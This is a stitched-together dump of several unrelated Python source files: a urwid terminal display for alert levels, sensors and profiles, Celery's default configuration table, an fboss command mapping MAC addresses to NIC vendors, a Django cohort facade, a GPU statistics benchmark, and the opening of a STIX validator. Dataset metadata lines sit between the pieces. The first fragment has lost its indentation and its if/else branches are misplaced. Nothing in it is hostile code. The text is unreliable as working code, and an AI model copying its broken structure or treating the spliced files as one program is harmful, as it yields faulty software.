temp = list()
temp.append(urwid.Text("Alert Level:"))
temp.append(urwid.Text(str(alertLevel.level)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Name:"))
temp.append(urwid.Text(alertLevel.name))
temp.append(urwid.Divider())
temp.append(urwid.Text("Profiles:"))
profile_str = ", ".join(map(lambda x: str(x), alertLevel.profiles))
temp.append(urwid.Text(profile_str))
temp.append(urwid.Divider())
temp.append(urwid.Text("Instrumentation Activated:"))
if alertLevel.instrumentation_active is None:
temp.append(urwid.Text("Undefined"))
elif alertLevel.instrumentation_active:
temp.append(urwid.Text("Yes"))
temp.append(urwid.Divider())
temp.append(urwid.Text("Instrumentation Cmd:"))
temp.append(urwid.Text(alertLevel.instrumentation_cmd))
temp.append(urwid.Divider())
temp.append(urwid.Text("Instrumentation Timeout:"))
temp.append(urwid.Text(str(alertLevel.instrumentation_timeout) + " Seconds"))
else:
temp.append(urwid.Text("No"))
return temp
# this function creates the detailed output of all alert objects
# in a list
def _createAlertsWidgetList(self, alerts: List[ManagerObjAlert]) -> List[urwid.Widget]:
temp = list()
first = True
for alert in alerts:
if first:
first = False
else:
temp.append(urwid.Divider())
temp.append(urwid.Divider("-"))
temp.extend(self._createAlertWidgetList(alert))
if not temp:
temp.append(urwid.Text("None"))
return temp
    # this function creates the detailed output of an alert object
# in a list
def _createAlertWidgetList(self, alert: ManagerObjAlert) -> List[urwid.Widget]:
temp = list()
temp.append(urwid.Text("Node ID:"))
temp.append(urwid.Text(str(alert.nodeId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Alert ID:"))
temp.append(urwid.Text(str(alert.alertId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Client Alert ID:"))
temp.append(urwid.Text(str(alert.clientAlertId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Description:"))
temp.append(urwid.Text(alert.description))
return temp
# this function creates the detailed output of all profile objects in a list
def _create_profiles_widget_list(self, profiles: List[ManagerObjProfile]) -> List[urwid.Widget]:
temp = list()
first = True
for profile in profiles:
if first:
first = False
else:
temp.append(urwid.Divider())
temp.append(urwid.Divider("-"))
temp.extend(self._create_profile_widget_list(profile))
if not temp:
temp.append(urwid.Text("None"))
return temp
# this function creates the detailed output of a profile object in a list
def _create_profile_widget_list(self, profile: ManagerObjProfile) -> List[urwid.Widget]:
temp = list()
temp.append(urwid.Text("Profile ID:"))
temp.append(urwid.Text(str(profile.profileId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Name:"))
temp.append(urwid.Text(profile.name))
return temp
# this function creates the detailed output of all sensor objects
# in a list
def _createSensorsWidgetList(self, sensors: List[ManagerObjSensor]) -> List[urwid.Widget]:
temp = list()
first = True
for sensor in sensors:
if first:
first = False
else:
temp.append(urwid.Divider())
temp.append(urwid.Divider("-"))
temp.extend(self._createSensorWidgetList(sensor))
if not temp:
temp.append(urwid.Text("None"))
return temp
# this function creates the detailed output of a sensor object
# in a list
def _createSensorWidgetList(self, sensor: ManagerObjSensor) -> List[urwid.Widget]:
temp = list()
temp.append(urwid.Text("Node ID:"))
temp.append(urwid.Text(str(sensor.nodeId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Sensor ID:"))
temp.append(urwid.Text(str(sensor.sensorId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Client Sensor ID:"))
temp.append(urwid.Text(str(sensor.clientSensorId)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Alert Delay:"))
temp.append(urwid.Text(str(sensor.alertDelay) + " Seconds"))
temp.append(urwid.Divider())
temp.append(urwid.Text("Description:"))
temp.append(urwid.Text(sensor.description))
temp.append(urwid.Divider())
temp.append(urwid.Text("State:"))
if sensor.state == 0:
temp.append(urwid.AttrMap(urwid.Text("Normal"), "neutral"))
elif sensor.state == 1:
temp.append(urwid.AttrMap(urwid.Text("Triggered"), "sensoralert"))
else:
temp.append(urwid.AttrMap(urwid.Text("Undefined"), "redColor"))
temp.append(urwid.Divider())
temp.append(urwid.Text("Data Type:"))
if sensor.dataType == SensorDataType.NONE:
temp.append(urwid.Text("None"))
elif sensor.dataType == SensorDataType.INT:
temp.append(urwid.Text("Integer"))
elif sensor.dataType == SensorDataType.FLOAT:
temp.append(urwid.Text("Floating Point"))
else:
temp.append(urwid.Text("Unknown"))
temp.append(urwid.Divider())
temp.append(urwid.Text("Data:"))
if sensor.dataType == SensorDataType.NONE:
temp.append(urwid.Text("None"))
else:
temp.append(urwid.Text(str(sensor.data)))
temp.append(urwid.Divider())
temp.append(urwid.Text("Last Updated (Server Time):"))
lastUpdatedWidget = urwid.Text(time.strftime("%D %H:%M:%S", time.localtime(sensor.lastStateUpdated)))
temp.append(lastUpdatedWidget)
return temp
# this function returns the final urwid widget that is used
# to render this object
def get(self) -> urwid.LineBox:
return self.detailedBox
# this function updates all internal widgets
def updateCompleteWidget(self,
sensors: List[ManagerObjSensor],
alerts: List[ManagerObjAlert],
profiles: List[ManagerObjProfile]):
self.updateAlertLevelDetails()
self.updateSensorsDetails(sensors)
self.updateAlertsDetails(alerts)
self.update_profile_details(profiles)
# this function updates the alert level information shown
def updateAlertLevelDetails(self):
        # create new alert level pile content
temp = self._createAlertLevelWidgetList(self.alertLevel)
# create a list of tuples for the pile widget
pileOptions = self.alertLevelPileWidget.options()
temp = [(x, pileOptions) for x in temp]
# empty pile widget contents and replace it with the new widgets
del self.alertLevelPileWidget.contents[:]
self.alertLevelPileWidget.contents.extend(temp)
    # this function updates the alert information shown
def updateAlertsDetails(self, alerts: List[ManagerObjAlert]):
        # create new alerts pile content
temp = self._createAlertsWidgetList(alerts)
# create a list of tuples for the pile widget
pileOptions = self.alertsPileWidget.options()
temp = [(x, pileOptions) for x in temp]
# empty pile widget contents and replace it with the new widgets
del self.alertsPileWidget.contents[:]
self.alertsPileWidget.contents.extend(temp)
def update_profile_details(self, profiles: List[ManagerObjProfile]):
"""
This function updates the profile information shown.
:param profiles:
"""
temp = self._create_profiles_widget_list(profiles)
# Create a list of tuples for the pile widget.
pile_options = self._profiles_pile_widget.options()
new_profiles_list = [(x, pile_options) for x in temp]
# Empty pile widget contents and replace it with the new widgets.
del self._profiles_pile_widget.contents[:]
self._profiles_pile_widget.contents.extend(new_profiles_list)
# this function updates the sensor information shown
def updateSensorsDetails(self, sensors: List[ManagerObjSensor]):
        # create new sensors pile content
temp = self._createSensorsWidgetList(sensors)
# create a list of tuples for the pile widget
pileOptions = self.sensorsPileWidget.options()
temp = [(x, pileOptions) for x in temp]
# empty pile widget contents and replace it with the new widgets
del self.sensorsPileWidget.contents[:]
self.sensorsPileWidget.contents.extend(temp)
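# Illustrative sketch: the display attribute names used above ("greenColor",
# "redColor_focus", "neutral", "connectionfail", ...) must be registered in
# the palette of the hosting urwid.MainLoop. A hypothetical minimal palette:
#
#     palette = [
#         ("greenColor", "dark green", ""),
#         ("greenColor_focus", "black", "dark green"),
#         ("redColor", "dark red", ""),
#         ("redColor_focus", "black", "dark red"),
#     ]
#     loop = urwid.MainLoop(top_widget, palette)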
|
agpl-3.0
| -2,799,409,555,636,106,000
| 35.415423
| 115
| 0.644784
| false
| 3.915218
| false
| false
| false
|
sivaprakashniet/push_pull
|
p2p/lib/python2.7/site-packages/celery/app/defaults.py
|
1
|
11107
|
# -*- coding: utf-8 -*-
"""
celery.app.defaults
~~~~~~~~~~~~~~~~~~~
Configuration introspection and defaults.
"""
from __future__ import absolute_import
import sys
from collections import deque, namedtuple
from datetime import timedelta
from celery.five import items
from celery.utils import strtobool
from celery.utils.functional import memoize
__all__ = ['Option', 'NAMESPACES', 'flatten', 'find']
is_jython = sys.platform.startswith('java')
is_pypy = hasattr(sys, 'pypy_version_info')
DEFAULT_POOL = 'prefork'
if is_jython:
DEFAULT_POOL = 'threads'
elif is_pypy:
if sys.pypy_version_info[0:3] < (1, 5, 0):
DEFAULT_POOL = 'solo'
else:
DEFAULT_POOL = 'prefork'
DEFAULT_ACCEPT_CONTENT = ['json', 'pickle', 'msgpack', 'yaml']
DEFAULT_PROCESS_LOG_FMT = """
[%(asctime)s: %(levelname)s/%(processName)s] %(message)s
""".strip()
DEFAULT_LOG_FMT = '[%(asctime)s: %(levelname)s] %(message)s'
DEFAULT_TASK_LOG_FMT = """[%(asctime)s: %(levelname)s/%(processName)s] \
%(task_name)s[%(task_id)s]: %(message)s"""
_BROKER_OLD = {'deprecate_by': '2.5', 'remove_by': '4.0',
'alt': 'BROKER_URL setting'}
_REDIS_OLD = {'deprecate_by': '2.5', 'remove_by': '4.0',
'alt': 'URL form of CELERY_RESULT_BACKEND'}
searchresult = namedtuple('searchresult', ('namespace', 'key', 'type'))
class Option(object):
alt = None
deprecate_by = None
remove_by = None
typemap = dict(string=str, int=int, float=float, any=lambda v: v,
bool=strtobool, dict=dict, tuple=tuple)
def __init__(self, default=None, *args, **kwargs):
self.default = default
self.type = kwargs.get('type') or 'string'
for attr, value in items(kwargs):
setattr(self, attr, value)
def to_python(self, value):
return self.typemap[self.type](value)
def __repr__(self):
return '<Option: type->{0} default->{1!r}>'.format(self.type,
self.default)
NAMESPACES = {
'BROKER': {
'URL': Option(None, type='string'),
'CONNECTION_TIMEOUT': Option(4, type='float'),
'CONNECTION_RETRY': Option(True, type='bool'),
'CONNECTION_MAX_RETRIES': Option(100, type='int'),
'FAILOVER_STRATEGY': Option(None, type='string'),
'HEARTBEAT': Option(None, type='int'),
'HEARTBEAT_CHECKRATE': Option(3.0, type='int'),
'LOGIN_METHOD': Option(None, type='string'),
'POOL_LIMIT': Option(10, type='int'),
'USE_SSL': Option(False, type='bool'),
'TRANSPORT': Option(type='string'),
'TRANSPORT_OPTIONS': Option({}, type='dict'),
'HOST': Option(type='string', **_BROKER_OLD),
'PORT': Option(type='int', **_BROKER_OLD),
'USER': Option(type='string', **_BROKER_OLD),
'PASSWORD': Option(type='string', **_BROKER_OLD),
'VHOST': Option(type='string', **_BROKER_OLD),
},
'CASSANDRA': {
'COLUMN_FAMILY': Option(type='string'),
'DETAILED_MODE': Option(False, type='bool'),
'KEYSPACE': Option(type='string'),
'READ_CONSISTENCY': Option(type='string'),
'SERVERS': Option(type='list'),
'WRITE_CONSISTENCY': Option(type='string'),
},
'CELERY': {
'ACCEPT_CONTENT': Option(DEFAULT_ACCEPT_CONTENT, type='list'),
'ACKS_LATE': Option(False, type='bool'),
'ALWAYS_EAGER': Option(False, type='bool'),
'ANNOTATIONS': Option(type='any'),
'FORCE_BILLIARD_LOGGING': Option(True, type='bool'),
'BROADCAST_QUEUE': Option('celeryctl'),
'BROADCAST_EXCHANGE': Option('celeryctl'),
'BROADCAST_EXCHANGE_TYPE': Option('fanout'),
'CACHE_BACKEND': Option(),
'CACHE_BACKEND_OPTIONS': Option({}, type='dict'),
'CHORD_PROPAGATES': Option(True, type='bool'),
'COUCHBASE_BACKEND_SETTINGS': Option(None, type='dict'),
'CREATE_MISSING_QUEUES': Option(True, type='bool'),
'DEFAULT_RATE_LIMIT': Option(type='string'),
'DISABLE_RATE_LIMITS': Option(False, type='bool'),
'DEFAULT_ROUTING_KEY': Option('celery'),
'DEFAULT_QUEUE': Option('celery'),
'DEFAULT_EXCHANGE': Option('celery'),
'DEFAULT_EXCHANGE_TYPE': Option('direct'),
'DEFAULT_DELIVERY_MODE': Option(2, type='string'),
'EAGER_PROPAGATES_EXCEPTIONS': Option(False, type='bool'),
'ENABLE_UTC': Option(True, type='bool'),
'ENABLE_REMOTE_CONTROL': Option(True, type='bool'),
'EVENT_SERIALIZER': Option('json'),
'EVENT_QUEUE_EXPIRES': Option(None, type='float'),
'EVENT_QUEUE_TTL': Option(None, type='float'),
'IMPORTS': Option((), type='tuple'),
'INCLUDE': Option((), type='tuple'),
'IGNORE_RESULT': Option(False, type='bool'),
'MAX_CACHED_RESULTS': Option(5000, type='int'),
'MESSAGE_COMPRESSION': Option(type='string'),
'MONGODB_BACKEND_SETTINGS': Option(type='dict'),
'REDIS_HOST': Option(type='string', **_REDIS_OLD),
'REDIS_PORT': Option(type='int', **_REDIS_OLD),
'REDIS_DB': Option(type='int', **_REDIS_OLD),
'REDIS_PASSWORD': Option(type='string', **_REDIS_OLD),
'REDIS_MAX_CONNECTIONS': Option(type='int'),
'RESULT_BACKEND': Option(type='string'),
'RESULT_DB_SHORT_LIVED_SESSIONS': Option(False, type='bool'),
'RESULT_DB_TABLENAMES': Option(type='dict'),
'RESULT_DBURI': Option(),
'RESULT_ENGINE_OPTIONS': Option(type='dict'),
'RESULT_EXCHANGE': Option('celeryresults'),
'RESULT_EXCHANGE_TYPE': Option('direct'),
'RESULT_SERIALIZER': Option('pickle'),
'RESULT_PERSISTENT': Option(None, type='bool'),
'ROUTES': Option(type='any'),
'SEND_EVENTS': Option(False, type='bool'),
'SEND_TASK_ERROR_EMAILS': Option(False, type='bool'),
'SEND_TASK_SENT_EVENT': Option(False, type='bool'),
'STORE_ERRORS_EVEN_IF_IGNORED': Option(False, type='bool'),
'TASK_PUBLISH_RETRY': Option(True, type='bool'),
'TASK_PUBLISH_RETRY_POLICY': Option({
'max_retries': 3,
'interval_start': 0,
'interval_max': 1,
'interval_step': 0.2}, type='dict'),
'TASK_RESULT_EXPIRES': Option(timedelta(days=1), type='float'),
'TASK_SERIALIZER': Option('pickle'),
'TIMEZONE': Option(type='string'),
'TRACK_STARTED': Option(False, type='bool'),
'REDIRECT_STDOUTS': Option(True, type='bool'),
'REDIRECT_STDOUTS_LEVEL': Option('WARNING'),
'QUEUES': Option(type='dict'),
'QUEUE_HA_POLICY': Option(None, type='string'),
'SECURITY_KEY': Option(type='string'),
'SECURITY_CERTIFICATE': Option(type='string'),
'SECURITY_CERT_STORE': Option(type='string'),
'WORKER_DIRECT': Option(False, type='bool'),
},
'CELERYD': {
'AGENT': Option(None, type='string'),
'AUTOSCALER': Option('celery.worker.autoscale:Autoscaler'),
'AUTORELOADER': Option('celery.worker.autoreload:Autoreloader'),
'CONCURRENCY': Option(0, type='int'),
'TIMER': Option(type='string'),
'TIMER_PRECISION': Option(1.0, type='float'),
'FORCE_EXECV': Option(False, type='bool'),
'HIJACK_ROOT_LOGGER': Option(True, type='bool'),
'CONSUMER': Option('celery.worker.consumer:Consumer', type='string'),
'LOG_FORMAT': Option(DEFAULT_PROCESS_LOG_FMT),
'LOG_COLOR': Option(type='bool'),
'LOG_LEVEL': Option('WARN', deprecate_by='2.4', remove_by='4.0',
alt='--loglevel argument'),
'LOG_FILE': Option(deprecate_by='2.4', remove_by='4.0',
alt='--logfile argument'),
'MAX_TASKS_PER_CHILD': Option(type='int'),
'POOL': Option(DEFAULT_POOL),
'POOL_PUTLOCKS': Option(True, type='bool'),
'POOL_RESTARTS': Option(False, type='bool'),
'PREFETCH_MULTIPLIER': Option(4, type='int'),
'STATE_DB': Option(),
'TASK_LOG_FORMAT': Option(DEFAULT_TASK_LOG_FMT),
'TASK_SOFT_TIME_LIMIT': Option(type='float'),
'TASK_TIME_LIMIT': Option(type='float'),
'WORKER_LOST_WAIT': Option(10.0, type='float')
},
'CELERYBEAT': {
'SCHEDULE': Option({}, type='dict'),
'SCHEDULER': Option('celery.beat:PersistentScheduler'),
'SCHEDULE_FILENAME': Option('celerybeat-schedule'),
'MAX_LOOP_INTERVAL': Option(0, type='float'),
'LOG_LEVEL': Option('INFO', deprecate_by='2.4', remove_by='4.0',
alt='--loglevel argument'),
'LOG_FILE': Option(deprecate_by='2.4', remove_by='4.0',
alt='--logfile argument'),
},
'CELERYMON': {
'LOG_LEVEL': Option('INFO', deprecate_by='2.4', remove_by='4.0',
alt='--loglevel argument'),
'LOG_FILE': Option(deprecate_by='2.4', remove_by='4.0',
alt='--logfile argument'),
'LOG_FORMAT': Option(DEFAULT_LOG_FMT),
},
'EMAIL': {
'HOST': Option('localhost'),
'PORT': Option(25, type='int'),
'HOST_USER': Option(),
'HOST_PASSWORD': Option(),
'TIMEOUT': Option(2, type='float'),
'USE_SSL': Option(False, type='bool'),
'USE_TLS': Option(False, type='bool'),
},
'SERVER_EMAIL': Option('celery@localhost'),
'ADMINS': Option((), type='tuple'),
}
def flatten(d, ns=''):
stack = deque([(ns, d)])
while stack:
name, space = stack.popleft()
for key, value in items(space):
if isinstance(value, dict):
stack.append((name + key + '_', value))
else:
yield name + key, value
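# Illustrative note: flatten() joins nested namespace keys with underscores,
# e.g. NAMESPACES['BROKER']['POOL_LIMIT'] surfaces as the flat setting name
# 'BROKER_POOL_LIMIT':
#
#     >>> dict(flatten(NAMESPACES))['BROKER_POOL_LIMIT'].default
#     10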
DEFAULTS = dict((key, value.default) for key, value in flatten(NAMESPACES))
def find_deprecated_settings(source):
from celery.utils import warn_deprecated
for name, opt in flatten(NAMESPACES):
if (opt.deprecate_by or opt.remove_by) and getattr(source, name, None):
warn_deprecated(description='The {0!r} setting'.format(name),
deprecation=opt.deprecate_by,
removal=opt.remove_by,
alternative='Use the {0.alt} instead'.format(opt))
return source
@memoize(maxsize=None)
def find(name, namespace='celery'):
# - Try specified namespace first.
namespace = namespace.upper()
try:
return searchresult(
namespace, name.upper(), NAMESPACES[namespace][name.upper()],
)
except KeyError:
# - Try all the other namespaces.
for ns, keys in items(NAMESPACES):
if ns.upper() == name.upper():
return searchresult(None, ns, keys)
elif isinstance(keys, dict):
try:
return searchresult(ns, name.upper(), keys[name.upper()])
except KeyError:
pass
# - See if name is a qualname last.
return searchresult(None, name.upper(), DEFAULTS[name.upper()])
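# Illustrative note: find() resolves a bare setting name to its namespace and
# Option, searching the given namespace first and then the others, e.g.:
#
#     >>> find('pool_limit')
#     searchresult(namespace='BROKER', key='POOL_LIMIT', type=<Option: ...>)
#     >>> find('default_queue')
#     searchresult(namespace='CELERY', key='DEFAULT_QUEUE', type=<Option: ...>)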
|
bsd-3-clause
| -1,949,531,072,986,532,400
| 40.289963
| 79
| 0.570451
| false
| 3.60266
| false
| false
| false
|
peterlei/fboss
|
fboss/py/fboss/cli/commands/nic.py
|
1
|
2427
|
#!/usr/bin/env python3
#
# Copyright (c) 2004-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from fboss.cli.commands import commands as cmds
from fboss.cli.data.oui_to_vendor_ieee import NIC_VENDOR_OUI_MAP
class NicCmd(cmds.PrintNeighborTableCmd):
'''Class for host NIC related commands in fboss.'''
_LENGTH_OF_OUI = 8
    _NO_MAC_FOUND_MESSAGE = "No MAC address found in ARP/NDP tables."
_UNKNOWN_VENDOR_MESSAGE = "Unknown NIC Vendor."
def run(self, detail, verbose):
self._client = self._create_agent_client()
# Get the MAC addresses for IPV4.
arp_table_detailed = self._client.getArpTable()
arp_mac_addresses = [arp_mac.mac for arp_mac in arp_table_detailed]
# Get the MAC addresses for IPV6.
ndp_table_detailed = self._client.getNdpTable()
ndp_mac_addresses = [ndp_mac.mac for ndp_mac in ndp_table_detailed]
mac_address_set = set(arp_mac_addresses + ndp_mac_addresses)
# Ignore the broadcast mac.
mac_address_set -= set(['ff:ff:ff:ff:ff:ff', 'FF:FF:FF:FF:FF:FF'])
        if not mac_address_set:
print(self._NO_MAC_FOUND_MESSAGE)
return
mac_nic_dictionary = {}
for mac in mac_address_set:
oui = mac[:self._LENGTH_OF_OUI].upper()
            if oui in NIC_VENDOR_OUI_MAP:
mac_nic_dictionary[mac] = NIC_VENDOR_OUI_MAP[oui]
else:
mac_nic_dictionary[mac] = self._UNKNOWN_VENDOR_MESSAGE
if detail or verbose:
for mac_address, vendor_name in mac_nic_dictionary.items():
print("MAC Address: " + mac_address + " Vendor: " + vendor_name)
return
        # Non-verbose output needs only the NIC vendor names.
nic_vendor_set = set(mac_nic_dictionary.values())
response = ""
if len(nic_vendor_set) == 0:
response = self._NO_MAC_FOUND_MESSAGE
elif len(nic_vendor_set) > 1:
response += ", ".join(str(nic_vendor_iterator)
for nic_vendor_iterator in nic_vendor_set)
else:
response += nic_vendor_set.pop()
print(response)
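# Illustrative note: the vendor lookup above assumes colon-separated MAC
# addresses, so the first 8 characters ("aa:bb:cc") form the vendor OUI. A
# hypothetical map entry and lookup:
#
#     NIC_VENDOR_OUI_MAP = {'00:02:C9': 'Mellanox'}
#     '00:02:c9:11:22:33'[:8].upper()  # -> '00:02:C9'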
|
bsd-3-clause
| 5,845,180,241,870,015,000
| 35.772727
| 80
| 0.613103
| false
| 3.532751
| false
| false
| false
|
pythonprobr/pythonpro-website
|
pythonpro/cohorts/facade.py
|
1
|
2292
|
from functools import partial
from django.conf import settings
from django.core.cache import cache
from django.db.models import Prefetch as _Prefetch
from django.urls import reverse
from pythonpro.cohorts.models import Cohort as _Cohort, CohortStudent, LiveClass as _LiveClass, Webinar as _Webinar
__all__ = [
'get_all_cohorts_desc',
'find_cohort',
'find_most_recent_cohort',
'calculate_most_recent_cohort_path',
'find_webinars',
'find_webinar',
'find_live_class',
]
def get_all_cohorts_desc():
lazy_all_cohorts = partial(tuple, _Cohort.objects.order_by('-start'))
return cache.get_or_set('ALL_COHORTS', lazy_all_cohorts, settings.CACHE_TTL)
def find_cohort(slug):
return _Cohort.objects.filter(slug=slug).prefetch_related(
_Prefetch(
'liveclass_set',
queryset=_LiveClass.objects.order_by('start'),
to_attr='classes'
)
).prefetch_related(
_Prefetch(
'webinar_set',
queryset=_Webinar.objects.order_by('start'),
to_attr='webinars'
)
).get()
def find_most_recent_cohort():
return _Cohort.objects.order_by('-start').first()
def calculate_most_recent_cohort_path() -> str:
slug_dct = _Cohort.objects.order_by('-start').values('slug').first()
return reverse('modules:detail', kwargs=slug_dct)
def find_webinars():
"""
Retrieve Webinars from database ordered by date desc
:return: Tuple of webinars
"""
return tuple(_Webinar.objects.order_by('-start'))
def find_recorded_webinars():
"""
Retrieve recorded Webinars from database ordered by date desc.
A recorded Webinar has vimeo_id not empty
:return: Tuple of webinars
"""
return tuple(_Webinar.objects.order_by('-start').exclude(vimeo_id__exact=''))
def find_webinar(slug):
"""
Retrieve Webinar by its slug
:return: Webinar
"""
return _Webinar.objects.filter(slug=slug).get()
def find_live_class(pk):
"""
Find Live Class by its PK, selecting related cohort
:param pk:
:return:
"""
return _LiveClass.objects.select_related('cohort').get(pk=pk)
def subscribe_to_last_cohort(user):
ch = CohortStudent(user=user, cohort=find_most_recent_cohort())
ch.save()
return ch
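# Illustrative note: get_all_cohorts_desc() wraps the queryset in
# functools.partial so the database is hit only on a cache miss;
# cache.get_or_set evaluates a callable default lazily:
#
#     cohorts = get_all_cohorts_desc()  # first call populates 'ALL_COHORTS'
#     cohorts = get_all_cohorts_desc()  # later calls are served from cache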
|
agpl-3.0
| -2,346,784,259,353,792,500
| 25.045455
| 115
| 0.65445
| false
| 3.385524
| false
| false
| false
|
dukestats/gpustats
|
scripts/bench.py
|
1
|
6208
|
from pandas import *
import numpy as np
from pycuda.gpuarray import to_gpu
import gpustats
import gpustats.util as util
from scipy.stats import norm
import timeit
data = np.random.randn(1000000)
mean = 20
std = 5
univ_setup = """
import numpy as np
from pycuda.gpuarray import to_gpu
k = 8
means = np.random.randn(k)
stds = np.abs(np.random.randn(k))
mean = 20
std = 5
import gpustats
from scipy.stats import norm
cpu_data = np.random.randn(%d)
gpu_data = cpu_data
"""
univ_setup_gpuarray = univ_setup + """
gpu_data = to_gpu(cpu_data)
"""
multivar_setup = """
# from __main__ import data, mean, std
import gpustats
import gpustats.util as util
import numpy as np
import testmod
from pycuda.gpuarray import to_gpu
import testmod
from numpy.linalg import cholesky as chol
import numpy.linalg as L
def next_multiple(k, p):
    if k % p:
        return k + (p - k % p)
    return k
PAD_MULTIPLE = 16
HALF_WARP = 16
def pad_data(data):
n, k = data.shape
    if not k % HALF_WARP:
pad_dim = k + 1
else:
pad_dim = k
if k != pad_dim:
padded_data = np.empty((n, pad_dim), dtype=np.float32)
padded_data[:, :k] = data
return padded_data
else:
return prep_ndarray(data)
def prep_ndarray(arr):
# is float32 and contiguous?
if not arr.dtype == np.float32 or not arr.flags.contiguous:
arr = np.array(arr, dtype=np.float32)
return arr
def pack_params(means, chol_sigmas, logdets):
to_pack = []
for m, ch, ld in zip(means, chol_sigmas, logdets):
to_pack.append(pack_pdf_params(m, ch, ld))
return np.vstack(to_pack)
def pack_pdf_params(mean, chol_sigma, logdet):
k = len(mean)
mean_len = k
chol_len = k * (k + 1) / 2
mch_len = mean_len + chol_len
packed_dim = next_multiple(mch_len + 2, PAD_MULTIPLE)
packed_params = np.empty(packed_dim, dtype=np.float32)
packed_params[:mean_len] = mean
packed_params[mean_len:mch_len] = chol_sigma[np.tril_indices(k)]
packed_params[mch_len:mch_len + 2] = 1, logdet
return packed_params
k = %d
dim = 15
means = np.random.randn(k, dim)
covs = [util.random_cov(dim) for _ in xrange(k)]
cpu_data = np.random.randn(%d, dim)
gpu_data = cpu_data
"""
multivar_setup_gpuarray = multivar_setup + """
gpu_data = to_gpu(cpu_data)
"""
LOG_2_PI = np.log(2 * np.pi)
# def mvnpdf(data, mean, cov):
# ichol_sigma = np.asarray(np.linalg.inv(np.linalg.cholesky(cov)))
# # ichol_sigma = np.tril(ichol_sigma)
# logdet = np.log(np.linalg.det(cov))
# return [_mvnpdf(x, mean, ichol_sigma, logdet)
# for x in data]
# def _mvnpdf(x, mean, ichol_sigma, logdet):
# demeaned = x - mean
# discrim = ((ichol_sigma * demeaned) ** 2).sum()
# # discrim = np.dot(demeaned, np.dot(ichol_sigma, demeaned))
# return - 0.5 * (discrim + logdet + LOG_2_PI * dim)
def get_timeit(stmt, setup, iter=10):
return timeit.Timer(stmt, setup).timeit(number=iter) / iter
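# Illustrative note: get_timeit() returns mean seconds per call, so the
# 'Speedup' columns below are plain CPU/GPU time ratios, e.g.:
#
#     get_timeit("sum(range(1000))", "pass", iter=100)  # ~seconds per call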
def compare_timings_single(n, setup=univ_setup):
gpu = "gpustats.normpdf(gpu_data, mean, std, logged=False)"
cpu = "norm.pdf(cpu_data, loc=mean, scale=std)"
setup = setup % n
return {'GPU' : get_timeit(gpu, setup, iter=1000),
'CPU' : get_timeit(cpu, setup)}
def compare_timings_multi(n, setup=univ_setup):
gpu = "gpustats.normpdf_multi(gpu_data, means, stds, logged=False)"
cpu = """
for m, s in zip(means, stds):
norm.pdf(cpu_data, loc=m, scale=s)
"""
setup = setup % n
return {'GPU' : get_timeit(gpu, setup, iter=100),
'CPU' : get_timeit(cpu, setup)}
def mvcompare_timings(n, k=1, setup=multivar_setup):
gpu = "gpustats.mvnpdf_multi(gpu_data, means, covs, logged=False)"
cpu = """
ichol_sigmas = [L.inv(chol(sig)) for sig in covs]
logdets = [np.log(np.linalg.det(sig)) for sig in covs]
params = pack_params(means, covs, logdets)
testmod.cpu_mvnpdf(cpu_data, params, dim)
"""
setup = setup % (k, n)
return {'GPU' : get_timeit(gpu, setup, iter=100),
'CPU' : get_timeit(cpu, setup)}
def get_timing_results(timing_f):
lengths = [100, 1000, 10000, 100000, 1000000]
result = {}
for n in lengths:
print n
result[n] = timing_f(n)
result = DataFrame(result).T
result['Speedup'] = result['CPU'] / result['GPU']
return result
# mvsingle = get_timing_results(mvcompare_timings)
# comp_gpu = lambda n: mvcompare_timings(n, setup=multivar_setup_gpuarray)
# mvsingle_gpu = get_timing_results(comp_gpu)
# multi_comp = lambda n: mvcompare_timings(n, k=16)
# mvmulti = get_timing_results(multi_comp)
# multi_comp_gpu = lambda n: mvcompare_timings(n, k=16,
# setup=multivar_setup_gpuarray)
# mvmulti_gpu = get_timing_results(multi_comp_gpu)
single = get_timing_results(compare_timings_single)
comp_gpu = lambda n: compare_timings_single(n, setup=univ_setup_gpuarray)
single_gpu = get_timing_results(comp_gpu)
multi = get_timing_results(compare_timings_multi)
comp_gpu = lambda n: compare_timings_multi(n, setup=univ_setup_gpuarray)
multi_gpu = get_timing_results(comp_gpu)
data = DataFrame({
'Single' : single['Speedup'],
'Single (GPUArray)' : single_gpu['Speedup'],
'Multi' : multi['Speedup'],
'Multi (GPUArray)' : multi_gpu['Speedup'],
})
# The multivariate benchmark runs above are commented out, so building this
# frame would raise NameError; keep it disabled until those runs are enabled.
# mvdata = DataFrame({
#     'Single' : mvsingle['Speedup'],
#     'Single (GPUArray)' : mvsingle_gpu['Speedup'],
#     'Multi' : mvmulti['Speedup'],
#     'Multi (GPUArray)' : mvmulti_gpu['Speedup'],
# })
if __name__ == '__main__':
import gpustats
import numpy as np
from scipy.stats import norm
import testmod
from numpy.linalg import cholesky as chol
import numpy.linalg as L
# dim = 15
# k = 8
# means = np.random.randn(k, dim)
# covs = [np.asarray(util.random_cov(dim)) for _ in xrange(k)]
# cpu_data = np.random.randn(100000, dim)
# gpu_data = to_gpu(cpu_data)
# ichol_sigmas = [L.inv(chol(sig)) for sig in covs]
# logdets = [np.log(np.linalg.det(sig)) for sig in covs]
# packed_params = pack_params(means, covs, logdets)
# pdfs = gpustats.mvnpdf(cpu_data, means[0], covs[0])
# pdfs = testmod.cpu_mvnpdf(cpu_data, packed_params, 15)
|
bsd-3-clause
| 1,382,903,943,584,763,100
| 26.22807
| 74
| 0.637081
| false
| 2.828246
| false
| false
| false
|
STIXProject/stix-validator
|
sdv/validators/stix/best_practice.py
|
1
|
42947
|
# Copyright (c) 2015, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
# builtin
import re
import itertools
import collections
import distutils.version
# external
from lxml import etree
from mixbox.vendor.six import iteritems, itervalues, with_metaclass
from mixbox import compat
# internal
from sdv import utils, xmlconst
# relative
from . import common
from .. import base
from ...utils import remove_version_prefix
# Python 2.6 doesn't have collections.OrderedDict :(
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
# STIX ID Format: [ns prefix]:[construct type]-[GUID]
# Note: This will validate invalid QNames, so this should be used with a
# QName format check.
